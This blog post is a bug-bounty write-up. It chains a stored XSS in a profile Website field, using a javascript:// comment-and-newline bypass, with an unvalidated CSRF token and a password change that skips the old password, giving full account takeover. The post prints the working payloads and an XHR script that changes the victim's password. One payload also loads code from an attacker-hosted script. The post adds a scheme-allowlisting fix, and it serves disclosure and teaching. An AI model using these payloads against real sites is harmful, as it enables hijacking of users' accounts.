XSS + CSRF = Bhoom!

Hello :D Everyone,

It had been a long time since I got a good bug and a bounty too :3, so after an OWASP meet where I met many leet bounty hunters I felt very motivated to do a bug hunt. I started poking around, and this is the story of a simple Full Account Takeover on a HackerOne (h1) private program.

Reported to: ****************
Types: Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS)
1. Stored XSS (Requires Interaction)
 I found an XSS on the main domain, in the Website field of the user's profile. I first tried javascript:alert(1) to check whether JavaScript could be executed, but the value was rejected as an invalid URL. So I modified the payload to javascript://http://google.com/?aaaa%0aalert(1), and it worked! The validator evidently only required the value to look like a URL (scheme://host/...) and did not restrict the scheme to http(s). For those who don't know how the payload is put together:

javascript:               - JavaScript's pseudo-scheme; the browser evaluates what follows the colon as code
//                        - begins a single-line comment in JavaScript
http://google.com/?aaaa   - the comment body (ignored), which also makes the value look like a normal URL
%0a                       - a URL-encoded newline (LF); it is percent-decoded before evaluation and ends the single-line comment
alert(1)                  - a valid JavaScript function call, which now executes
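To make the bypass concrete, here is an added example (not code from the original post or from the target site) in Node.js. naiveLooksLikeUrl is a hypothetical reconstruction of the kind of "looks like a URL" check that rejects javascript:alert(1) but accepts the javascript:// form; javascriptUrlBody shows what the browser actually evaluates after percent-decoding; isSafeWebsiteUrl is the hardened check, which parses the value with the WHATWG URL parser and allowlists the scheme. The sample payloads are the ones from the post plus a constructed legitimate URL.

```javascript
// Added example: naive URL validation that the javascript:// payload bypasses,
// what the browser evaluates, and a scheme-allowlisting replacement.
// naiveLooksLikeUrl is a hypothetical stand-in for the site's validator.

// Hypothetical naive check: accepts anything shaped like "<scheme>://<rest>".
// "javascript:alert(1)" has no "//", so it fails; "javascript://http://..." passes.
function naiveLooksLikeUrl(value) {
  return /^[a-z][a-z0-9+.-]*:\/\/\S+$/i.test(value);
}

// What a browser evaluates for a javascript: URL: everything after the scheme,
// percent-decoded. "%0a" becomes a real newline, which terminates the "//"
// comment, so the code on the next line runs.
function javascriptUrlBody(value) {
  if (!/^javascript:/i.test(value)) return null;
  try {
    return decodeURIComponent(value.slice("javascript:".length));
  } catch (e) {
    return null; // malformed percent-encoding
  }
}

// Hardened check: parse with the real URL parser and allowlist the scheme.
// The scheme is decided by the parser, not by where "//" happens to appear.
function isSafeWebsiteUrl(value) {
  let url;
  try {
    url = new URL(value);
  } catch (e) {
    return false;
  }
  return (url.protocol === "http:" || url.protocol === "https:") && url.hostname !== "";
}

// Constructed sample inputs: the two payloads from the post and a legitimate URL.
const payloads = {
  plain: "javascript:alert(1)",
  bypass: "javascript://http://google.com/?aaaa%0aalert(1)",
  legit: "https://example.com/profile",
};
```

Run with node: naiveLooksLikeUrl accepts payloads.bypass and payloads.legit but not payloads.plain, while isSafeWebsiteUrl accepts only payloads.legit. javascriptUrlBody(payloads.bypass) returns two lines, the second being alert(1).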

So it got saved on my profile. It is stored, but it requires interaction: the victim has to click the attacker's Website link, so the attacker sends them the link to the attacker's profile page, which is publicly accessible. That's how I got a simple XSS with an easy bypass. Before reporting I decided to go further and played around a little more, and I found that the "Change Password" functionality doesn't ask for the user's old password. That was pretty awesome to exploit :D combined with the XSS we found.


2. CSRF Bypass
 Even though I had an XSS, I decided to check whether an anti-CSRF token was present and validated (with an XSS this isn't strictly needed, since the token can be read from the page with an XHR anyway). To check whether the token is validated on the server side, all I did was remove the authenticity_token parameter from the password-change form :D and boom! the password got updated without it. The utf8=✓, _method=put and authenticity_token fields are Rails form conventions, and a Rails app with forgery protection enabled would have rejected a request with the token missing, so the token was evidently not being checked on this endpoint.

3. Full Account Takeover
Combining the XSS with the missing old-password check, I created a PoC that takes over the victim's account with a single click on the Website link of the attacker's profile. All we need is for the victim to be logged into their account.

Earlier, while changing the password, I saw that the form was submitted to an endpoint containing a unique user id that is not publicly known:
https://www.******.com/users/{UNIQUE ID}
So we just needed to grab the victim's user id, and since the CSRF token is not validated we don't need to grab that.

So I made an XHR request to /account from inside the victim's session (various other endpoints also contained the user_id in their source), parsed the victim's user_id out of the response, and submitted the password-change form with that user_id.

I hosted this JavaScript on an HTTPS domain. Because the injected script runs in the target's origin, the XHR carries the victim's session cookie automatically; the form is built and submitted inside the onload callback, after the user id has been parsed out of the response, since the request is asynchronous.

var http = new XMLHttpRequest();
http.open("GET", "https://www.*******.com/account", true);
http.onload = function () {
    if (http.status !== 200) {
        return;
    }
    // Parse the victim's account page; the edit form's id is "edit_user_<id>".
    var dom = new DOMParser().parseFromString(http.responseText, "text/html");
    var user_id = dom.getElementsByClassName("edit_user")[0].id.split("_")[2];
    submitPasswordChange(user_id);
};
http.send();

function submitPasswordChange(user_id) {
    var f = document.createElement("form");
    f.action = "https://www.********.com/users/" + user_id;
    f.method = "POST";
    f.id = "edit_user_" + user_id;
    f.className = "edit_user";
    // Rails-style fields copied from the real form. No authenticity_token,
    // because the server does not validate it; no old password, because the
    // form never asks for one. A submit button is not needed: form.submit()
    // never includes a submitter's name/value.
    var fields = {
        "utf8": "✓",
        "_method": "put",
        "page": "password",
        "user[password]": "my1337pass"
    };
    for (var name in fields) {
        var input = document.createElement("input");
        input.type = "hidden";
        input.name = name;
        input.value = fields[name];
        f.appendChild(input);
    }
    // The form must be attached to the document before submit() will navigate.
    document.body.appendChild(f);
    f.submit();
}

Then I entered
 javascript://http://google.com.?a%0avar x=document.createElement('script');x.src='https://myhost/script.js';document.body.appendChild(x);
as the Website URL on my (attacker's) profile and saved it. It is the same trick as before: everything between // and the %0a is a comment, and the code after the newline loads the hosted script into the victim's page.

Now all the victim had to do was click on the attacker's website link, and BOOM! their password got changed to 'my1337pass'.


I got a fair enough bounty :D.

Thanks to every awesome infosec people who share their knowledge.

10 comments:

  1. bug bounty gawd, h1 private site

  2. Amazing PoC dude! Thanks for sharing!

    https://twitter.com/knowledge_2014

    best regards
    ak1t4

  3. I am confused: javascript://http://google.com/?aaaa%0aalert(1)
    This payload still runs and worked for many domains. What is this?


